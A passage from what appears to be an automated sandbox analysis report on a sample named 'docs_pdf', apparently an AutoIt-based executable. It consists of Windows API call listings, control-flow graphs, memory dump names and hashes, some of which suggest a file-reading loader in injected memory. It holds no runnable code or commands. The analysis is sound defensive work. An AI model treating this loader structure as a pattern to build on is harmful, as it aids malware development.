                                                            • _wcsncpy.LIBCMT ref: 0015974F
                                                            • DeleteFileW.KERNEL32(?,?), ref: 00159785
                                                            • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0015979B
                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001597AC
                                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001597BE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                            • String ID:
                                                            • API String ID: 1500180987-0
                                                            • Opcode ID: 2b4a225312abf6fe392f02b4965348945c2467499bf6867be5382f0a0fa24364
                                                            • Instruction ID: 7a8f0cb47b7e88c03bae9675e3f0377e25b7b0aa0f05d0960a3c14b8efe24a7d
                                                            • Opcode Fuzzy Hash: 2b4a225312abf6fe392f02b4965348945c2467499bf6867be5382f0a0fa24364
                                                            • Instruction Fuzzy Hash: 9AC13CB1D00219EACF15DF94CC85EDEB7BDAF58301F0040AAF619E7151EB309A898F65

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 000F4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,001B62F8,?,000F37C0,?), ref: 000F4882
                                                              • Part of subcall function 0011074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,000F72C5), ref: 00110771
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 000F7308
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0012ECF1
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0012ED32
                                                            • RegCloseKey.ADVAPI32(?), ref: 0012ED70
                                                            • _wcscat.LIBCMT ref: 0012EDC9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\$`Y
                                                            • API String ID: 2673923337-3526359297
                                                            • Opcode ID: a8ca55c9e3e0c3e4ca469abdf39ba7c68e42e4a4789a4d069df2429a11401790
                                                            • Instruction ID: df7e01d3db479f8a7a34342903b7efc433a34498cea0042936a7ac1cd8fb161f
                                                            • Opcode Fuzzy Hash: a8ca55c9e3e0c3e4ca469abdf39ba7c68e42e4a4789a4d069df2429a11401790
                                                            • Instruction Fuzzy Hash: 7271AF714083059EC714EF65EC819ABBBF8FF98340F44096EF549D36A1DB309989CB62

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 000F3074
                                                            • RegisterClassExW.USER32(00000030), ref: 000F309E
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000F30AF
                                                            • InitCommonControlsEx.COMCTL32(?), ref: 000F30CC
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000F30DC
                                                            • LoadIconW.USER32(000000A9), ref: 000F30F2
                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000F3101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: 08480aeba827ecf58b77a83de888a69ac23437f256672012ec31b516ec26f17c
                                                            • Instruction ID: d1a85d5f8bd8acff609758279815deb4fcacdcc915c2930e564a047b5ac345ef
                                                            • Opcode Fuzzy Hash: 08480aeba827ecf58b77a83de888a69ac23437f256672012ec31b516ec26f17c
                                                            • Instruction Fuzzy Hash: 98313871844349EFDB41DFA4E885ADABBF0FB09310F14456EE584A66A0E3B905C6CF50

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 000F3074
                                                            • RegisterClassExW.USER32(00000030), ref: 000F309E
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000F30AF
                                                            • InitCommonControlsEx.COMCTL32(?), ref: 000F30CC
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000F30DC
                                                            • LoadIconW.USER32(000000A9), ref: 000F30F2
                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000F3101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: c9b13fc0542578c145f1bcafd29030c9790c5f8b0aa7e364d75aa92f5123d54c
                                                            • Instruction ID: e048c712e6264f417c55acdc077ceadd8a90d6f8602d65a882647f16162febf4
                                                            • Opcode Fuzzy Hash: c9b13fc0542578c145f1bcafd29030c9790c5f8b0aa7e364d75aa92f5123d54c
                                                            • Instruction Fuzzy Hash: A121C5B5940318AFDB00DFA4EC49B9EBBF5FB08710F00422AF514A66A0D7B545858F91

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 000F3A62
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 000F3A71
                                                            • LoadIconW.USER32(00000063), ref: 000F3A88
                                                            • LoadIconW.USER32(000000A4), ref: 000F3A9A
                                                            • LoadIconW.USER32(000000A2), ref: 000F3AAC
                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 000F3AD2
                                                            • RegisterClassExW.USER32(?), ref: 000F3B28
                                                              • Part of subcall function 000F3041: GetSysColorBrush.USER32(0000000F), ref: 000F3074
                                                              • Part of subcall function 000F3041: RegisterClassExW.USER32(00000030), ref: 000F309E
                                                              • Part of subcall function 000F3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000F30AF
                                                              • Part of subcall function 000F3041: InitCommonControlsEx.COMCTL32(?), ref: 000F30CC
                                                              • Part of subcall function 000F3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000F30DC
                                                              • Part of subcall function 000F3041: LoadIconW.USER32(000000A9), ref: 000F30F2
                                                              • Part of subcall function 000F3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000F3101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                            • String ID: #$0$AutoIt v3
                                                            • API String ID: 423443420-4155596026
                                                            • Opcode ID: 1ee9b8c8dba168b824f25e00a4a332eab248ea92077e46cce384c8ae5e8aff5e
                                                            • Instruction ID: 97ab78c98729bc503b61e63993cbb750e7c6053416c45473b1dbced84699f093
                                                            • Opcode Fuzzy Hash: 1ee9b8c8dba168b824f25e00a4a332eab248ea92077e46cce384c8ae5e8aff5e
                                                            • Instruction Fuzzy Hash: F0215171D00308AFEB159FA4EC05BAE7BB4FB18711F004269F604A66A0D7BD5994DF44

                                                            Control-flow Graph

                                                            control_flow_graph 767 f3633-f3681 769 f3683-f3686 767->769 770 f36e1-f36e3 767->770 772 f3688-f368f 769->772 773 f36e7 769->773 770->769 771 f36e5 770->771 774 f36ca-f36d2 DefWindowProcW 771->774 777 f375d-f3765 PostQuitMessage 772->777 778 f3695-f369a 772->778 775 f36ed-f36f0 773->775 776 12d31c-12d34a call 1011d0 call 1011f3 773->776 779 f36d8-f36de 774->779 781 f3715-f373c SetTimer RegisterWindowMessageW 775->781 782 f36f2-f36f3 775->782 814 12d34f-12d356 776->814 780 f3711-f3713 777->780 783 12d38f-12d3a3 call 152a16 778->783 784 f36a0-f36a2 778->784 780->779 781->780 788 f373e-f3749 CreatePopupMenu 781->788 786 f36f9-f370c KillTimer call f44cb call f3114 782->786 787 12d2bf-12d2c2 782->787 783->780 809 12d3a9 783->809 789 f36a8-f36ad 784->789 790 f3767-f3776 call f4531 784->790 786->780 794 12d2c4-12d2c6 787->794 795 12d2f8-12d317 MoveWindow 787->795 788->780 797 12d374-12d37b 789->797 798 f36b3-f36b8 789->798 790->780 803 12d2e7-12d2f3 SetFocus 794->803 804 12d2c8-12d2cb 794->804 795->780 797->774 806 12d381-12d38a call 14817e 797->806 807 f36be-f36c4 798->807 808 f374b-f375b call f45df 798->808 803->780 804->807 810 12d2d1-12d2e2 call 1011d0 804->810 806->774 807->774 807->814 808->780 809->774 810->780 814->774 815 12d35c-12d36f call f44cb call f43db 814->815 815->774
                                                            APIs
                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 000F36D2
                                                            • KillTimer.USER32(?,00000001), ref: 000F36FC
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000F371F
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000F372A
                                                            • CreatePopupMenu.USER32 ref: 000F373E
                                                            • PostQuitMessage.USER32(00000000), ref: 000F375F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                            • String ID: TaskbarCreated
                                                            • API String ID: 129472671-2362178303
                                                            • Opcode ID: e9565af2075c4122f0b8ff1b2a7dc7d94144daf704bebe0714068186ace79263
                                                            • Instruction ID: 281244031b40f37ea52a82a9512bb47ae8cae25759197c911c19b2b3e8505bdd
                                                            • Opcode Fuzzy Hash: e9565af2075c4122f0b8ff1b2a7dc7d94144daf704bebe0714068186ace79263
                                                            • Instruction Fuzzy Hash: A641E9B110420DBBDB347B24EC49BBE37A5EB14351F140229FB02D6EE1DB689D91B661

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                            • API String ID: 1825951767-3513169116
                                                            • Opcode ID: 9497e56b95b5d4ec9f00d0421232955aa99904001d43b2edb5665fbcb9ed7650
                                                            • Instruction ID: b09abac425dd7916cd7a1811a607ae2a84bec8a4a7540748dd939bf4672b9ff9
                                                            • Opcode Fuzzy Hash: 9497e56b95b5d4ec9f00d0421232955aa99904001d43b2edb5665fbcb9ed7650
                                                            • Instruction Fuzzy Hash: 33A16B7281422DAADF04EFA0DC91AFEB778BF24310F040129F616B7592DF749A49DB60

                                                            Control-flow Graph

                                                            control_flow_graph 942 36e25c0-36e266e call 36e0000 945 36e2675-36e269b call 36e34d0 CreateFileW 942->945 948 36e269d 945->948 949 36e26a2-36e26b2 945->949 950 36e27ed-36e27f1 948->950 956 36e26b9-36e26d3 VirtualAlloc 949->956 957 36e26b4 949->957 951 36e2833-36e2836 950->951 952 36e27f3-36e27f7 950->952 958 36e2839-36e2840 951->958 954 36e27f9-36e27fc 952->954 955 36e2803-36e2807 952->955 954->955 959 36e2809-36e2813 955->959 960 36e2817-36e281b 955->960 961 36e26da-36e26f1 ReadFile 956->961 962 36e26d5 956->962 957->950 963 36e2895-36e28aa 958->963 964 36e2842-36e284d 958->964 959->960 967 36e281d-36e2827 960->967 968 36e282b 960->968 969 36e26f8-36e2738 VirtualAlloc 961->969 970 36e26f3 961->970 962->950 965 36e28ac-36e28b7 VirtualFree 963->965 966 36e28ba-36e28c2 963->966 971 36e284f 964->971 972 36e2851-36e285d 964->972 965->966 967->968 968->951 975 36e273f-36e275a call 36e3720 969->975 976 36e273a 969->976 970->950 971->963 973 36e285f-36e286f 972->973 974 36e2871-36e287d 972->974 978 36e2893 973->978 979 36e287f-36e2888 974->979 980 36e288a-36e2890 974->980 982 36e2765-36e276f 975->982 976->950 978->958 979->978 980->978 983 36e27a2-36e27b6 call 36e3530 982->983 984 36e2771-36e27a0 call 36e3720 982->984 990 36e27ba-36e27be 983->990 991 36e27b8 983->991 984->982 992 36e27ca-36e27ce 990->992 993 36e27c0-36e27c4 FindCloseChangeNotification 990->993 991->950 994 36e27de-36e27e7 992->994 995 36e27d0-36e27db VirtualFree 992->995 993->992 994->945 994->950 995->994
                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 036E2691
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 036E28B7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2106556596.00000000036E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_36e0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CreateFileFreeVirtual
                                                            • String ID:
                                                            • API String ID: 204039940-0
                                                            • Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                                                            • Instruction ID: 59ec276cb396726c7d68331dd568568ebc7d6ec36b514f7ffe10157d4c809784
                                                            • Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                                                            • Instruction Fuzzy Hash: 54A12A74E01208EBDF14DFA4C998BEEB7BABF48304F248599E501BB280D7759A49CF54

                                                            Control-flow Graph

                                                            control_flow_graph 1073 f39e7-f3a57 CreateWindowExW * 2 ShowWindow * 2
                                                            APIs
                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000F3A15
                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000F3A36
                                                            • ShowWindow.USER32(00000000,?,?), ref: 000F3A4A
                                                            • ShowWindow.USER32(00000000,?,?), ref: 000F3A53
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateShow
                                                            • String ID: AutoIt v3$edit
                                                            • API String ID: 1584632944-3779509399
                                                            • Opcode ID: 9ee6cd732228ebece568969d53c405f391d2b393e53e5160728d1c826d7f12bb
                                                            • Instruction ID: 7b69fa887c1881f5475c37bd61b80fef2538da1351c2c991768b2b7aa8858862
                                                            • Opcode Fuzzy Hash: 9ee6cd732228ebece568969d53c405f391d2b393e53e5160728d1c826d7f12bb
                                                            • Instruction Fuzzy Hash: 29F0FE716412907EFA311B27AC4DE7B3E7DD7D6F50F00426EB904A2670C7B91891DAB0

                                                            Control-flow Graph

                                                            control_flow_graph 1074 36e23b0-36e24be call 36e0000 call 36e22a0 CreateFileW 1081 36e24c5-36e24d5 1074->1081 1082 36e24c0 1074->1082 1085 36e24dc-36e24f6 VirtualAlloc 1081->1085 1086 36e24d7 1081->1086 1083 36e2575-36e257a 1082->1083 1087 36e24fa-36e2511 ReadFile 1085->1087 1088 36e24f8 1085->1088 1086->1083 1089 36e2515-36e254f call 36e22e0 call 36e12a0 1087->1089 1090 36e2513 1087->1090 1088->1083 1095 36e256b-36e2573 ExitProcess 1089->1095 1096 36e2551-36e2566 call 36e2330 1089->1096 1090->1083 1095->1083 1096->1095
                                                            APIs
                                                              • Part of subcall function 036E22A0: Sleep.KERNELBASE(000001F4), ref: 036E22B1
                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 036E24B4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2106556596.00000000036E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_36e0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CreateFileSleep
                                                            • String ID: YL0N65PV2I9
                                                            • API String ID: 2694422964-4008997143
                                                            • Opcode ID: 6dad13f3711b37bb72b0fc460e06b9208511894847a751ab14afd44f8cc928b8
                                                            • Instruction ID: 7adead62a11bd62467228bd064305190ae86b87a1be6fc6dc5986726fe9b1b27
                                                            • Opcode Fuzzy Hash: 6dad13f3711b37bb72b0fc460e06b9208511894847a751ab14afd44f8cc928b8
                                                            • Instruction Fuzzy Hash: 9F518331D15249EBEB10EBE4C919BEFBB79AF48300F004599E608BB2C0D7751B49CBA5

                                                            Control-flow Graph

                                                            control_flow_graph 1098 11564d-115666 1099 115683 1098->1099 1100 115668-11566d 1098->1100 1102 115685-11568b 1099->1102 1100->1099 1101 11566f-115671 1100->1101 1103 115673-115678 call 118d68 1101->1103 1104 11568c-115691 1101->1104 1114 11567e call 118ff6 1103->1114 1106 115693-11569d 1104->1106 1107 11569f-1156a3 1104->1107 1106->1107 1109 1156c3-1156d2 1106->1109 1110 1156b3-1156b5 1107->1110 1111 1156a5-1156b0 call 113020 1107->1111 1112 1156d4-1156d7 1109->1112 1113 1156d9 1109->1113 1110->1103 1116 1156b7-1156c1 1110->1116 1111->1110 1117 1156de-1156e3 1112->1117 1113->1117 1114->1099 1116->1103 1116->1109 1120 1156e9-1156f0 1117->1120 1121 1157cc-1157cf 1117->1121 1122 115731-115733 1120->1122 1123 1156f2-1156fa 1120->1123 1121->1102 1125 115735-115737 1122->1125 1126 11579d-11579e call 120df7 1122->1126 1123->1122 1124 1156fc 1123->1124 1127 115702-115704 1124->1127 1128 1157fa 1124->1128 1129 115739-115741 1125->1129 1130 11575b-115766 1125->1130 1134 1157a3-1157a7 1126->1134 1137 115706-115708 1127->1137 1138 11570b-115710 1127->1138 1139 1157fe-115807 1128->1139 1132 115751-115755 1129->1132 1133 115743-11574f 1129->1133 1135 115768 1130->1135 1136 11576a-11576d 1130->1136 1140 115757-115759 1132->1140 1133->1140 1134->1139 1141 1157a9-1157ae 1134->1141 1135->1136 1142 1157d4-1157d8 1136->1142 1143 11576f-11577b call 114916 call 1210ab 1136->1143 1137->1138 1138->1142 1144 115716-11572f call 120f18 1138->1144 1139->1102 1140->1136 1141->1142 1145 1157b0-1157c1 1141->1145 1146 1157ea-1157f5 call 118d68 1142->1146 1147 1157da-1157e7 call 113020 1142->1147 1159 115780-115785 1143->1159 1158 115792-11579b 1144->1158 1150 1157c4-1157c6 1145->1150 1146->1114 1147->1146 1150->1120 1150->1121 1158->1150 1160 11578b-11578e 1159->1160 1161 11580c-115810 1159->1161 1160->1128 1162 115790 1160->1162 1161->1139 1162->1158
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                            • String ID:
                                                            • API String ID: 1559183368-0
                                                            • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                            • Instruction ID: 33e347252693417f9b0a24722e5025c401b3b57e8fa02e498a25039bc6a60180
                                                            • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                            • Instruction Fuzzy Hash: 67518270A00B05DBDB2C9EA9C8856EE77A3AF90320F648739F835962D0D7709D90CB90

                                                            Control-flow Graph (rendered graph for function 000F69CA omitted)
                                                            APIs
                                                              • Part of subcall function 000F4F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,001B62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 000F4F6F
                                                            • _free.LIBCMT ref: 0012E68C
                                                            • _free.LIBCMT ref: 0012E6D3
                                                              • Part of subcall function 000F6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 000F6D0D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _free$CurrentDirectoryLibraryLoad
                                                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                            • API String ID: 2861923089-1757145024
                                                            • Opcode ID: a285622e0b5ded24b4e046f716672249896f1b42190c7a74a3ef3e3aed2330f3
                                                            • Instruction ID: 300b3c24175230aff99d9d0601aa814eeb1330d575f2134e969988e0eabd839c
                                                            • Opcode Fuzzy Hash: a285622e0b5ded24b4e046f716672249896f1b42190c7a74a3ef3e3aed2330f3
                                                            • Instruction Fuzzy Hash: 3B919071910229EFCF08EFA4DC919EEB7B4FF19310F14446AF915AB292EB309915DB60
                                                            APIs
                                                              • Part of subcall function 001103A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 001103D3
                                                              • Part of subcall function 001103A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 001103DB
                                                              • Part of subcall function 001103A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 001103E6
                                                              • Part of subcall function 001103A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 001103F1
                                                              • Part of subcall function 001103A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 001103F9
                                                              • Part of subcall function 001103A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00110401
                                                              • Part of subcall function 00106259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,000FFA90), ref: 001062B4
                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 000FFB2D
                                                            • OleInitialize.OLE32(00000000), ref: 000FFBAA
                                                            • CloseHandle.KERNEL32(00000000), ref: 001349F2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                            • String ID: 0
                                                            • API String ID: 1986988660-3684773922
                                                            • Opcode ID: 9372992b732bd1d418349d0b710217b54dedad74a27b30dac4adf15ab790440f
                                                            • Instruction ID: 4767658eed702040b104abafd83c7e3a3d948ff6a7fb687d8aa4b40dbcb2fb6a
                                                            • Opcode Fuzzy Hash: 9372992b732bd1d418349d0b710217b54dedad74a27b30dac4adf15ab790440f
                                                            • Instruction Fuzzy Hash: C981BAB1904A408EC394EF2AEE556A67BF4FB78308710863ED018D7A72EB7D4485CF51
                                                            APIs
